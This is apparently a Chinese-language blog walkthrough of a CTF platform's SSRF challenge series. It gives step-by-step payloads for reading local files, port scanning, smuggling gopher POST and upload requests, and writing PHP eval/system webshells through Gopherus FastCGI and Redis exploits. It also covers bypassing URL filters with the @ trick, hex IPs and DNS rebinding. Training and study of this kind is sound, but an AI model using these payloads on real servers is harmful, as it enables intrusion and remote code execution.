一.内网访问
输入127.0.0.1/flag.php
二.伪协议读取文件
输入?url=file:///var/www/html/flag.php
右键页面查看源代码
三.端口扫描
尝试一下index.php,没有显示,说明有这个文件
上方题中提示我们端口在8000-9000中我们用burp suite抓包,开启代理
输入?url=127.0.0.1:8000/index.php
右键空白处,发送到intruder,选中端口8000,再点击添加payload
在进入到payload中,按照下图填选,选中。
我们看这个200响应码的,去访问就会得到答案
四.POST请求
我们输入?url=http://127.0.0.1/flag.php
再查看页面源代码,我们发现有一个钥匙
复制下来,去把它放到白色框中,抓它的包,把下方图片的框中的内容全部删掉
然后改成向下方图一样的字样
再将这些数据复制下来,去进行第一次url编码
将编码后的内容复制下来去打开记事本,粘贴下来,点击替换
将%0a替换为%0d%0a
再在最末尾也加上%0d%0a
将他们复制下来,进行第二次url编码
将二次编码的结果复制下来去原网址访问
将上方%253A换成冒号
回车
我们就会得到flag了
五.上传文件
上方提示我们需要上传文件
所以我们输入?url=file:///var/www/html/flag.php
就会得到下方图片的内容
这个需要我们写一个一句话木马文件上传,但是没有提交按钮,我们来自己构造一个
右键选择检查,在下方框中添加<input type="submit" name="submit">再点击空白处
就会出现一个按钮
我们创建一个名为1.php的文件,里面
输入<?php @eval($_POST[cmd]); ?>
保存后带年纪浏览,选中这个木马文件,这个时候打开代理,准备抓包
下方就是我们抓到的数据包
与POST请求关卡相似,改成下方的模样
全部复制下来,进行第一次url编码
将结果复制,打开记事本,把%0a替换为%0d%0a,再把结尾加上%0d%0a
全部复制下来,再去进行第二次url编码
将结果复制下来,去访问,记得把%253A换成冒号,就得到flag了
六.FastCGI协议
这里有一个题目附录,在这关我们需要用到一款名为Gopherus工具,还需要用到python2的环境,我这里是在kali做的,工具大家自己去下载
在kali中,点进这个工具
在这里打开终端
输入python2 gopherus.py查看一下用法
了解之后,我们在
输入python2 gopherus.py --exploit fastcgi
在上方输入/var/www/html/index.php
这里我们上传一个一句话木马,利用base64编码一下
在输入echo "PD9waHAgQHN5c3RlbSgkX0dFVFsnYSddKTsgPz4=" | base64 -d > 666.php
将下方框中的内容复制下来
在进行一次url编码
出现上访的情况就说明写进去了
在输入666.php?a=ls%20../../../;
我们会看到一个flag_617c826d2c56425e32808f1b4afefafb的文件,cat一下,得到flag
七.Redis
这关与上一关相似
输入python2 gopherus.py --exploit redis
输入PHPshell
输入/var/www/html或者直接回车
输入<?php @eval($_POST[a]) ?>或者直接回车
进行url编码
将结果复制下来,去访问
这里我们直接点旁边的X,结束,在访问一下shell.php,看看我们的木马是否写进去了
这就说明我们的木马已经写进去了,这回我们用蚁剑连一下
我们来到根目录,向下翻,看见了一个flag_25a71a953929896cac24e78b3f84d6dd文件
点进去,就发现了flag
八.URL Bypass
这里给出了提示
输入?url=http://notfound.ctfhub.com@127.0.0.1/flag.php
上方的@表示左边的当成用户,右边的是网址,而提示又说必须用http://notfound.ctfhub.com才能访问,所以我们用一个@就可以解决
九.数字IP Bypass
输入?url=127.0.0.1/flag.php
我们发现它ban掉了127,172,@
所以我们用16进制来代替127.0.0.1
输入?url=0x7F000001/flag.php
十.302跳转 Bypass
输入?url=http://0.0.0.0/flag.php
或者
输入
十一.DNS重绑定 Bypass
在B输入127.0.0.2
回车
将下方红框中的复制
访问?url=http://7f000001.7f000002.rbndr.us/flag.php得出flag
以上就是SSRF的全部通关攻略!!!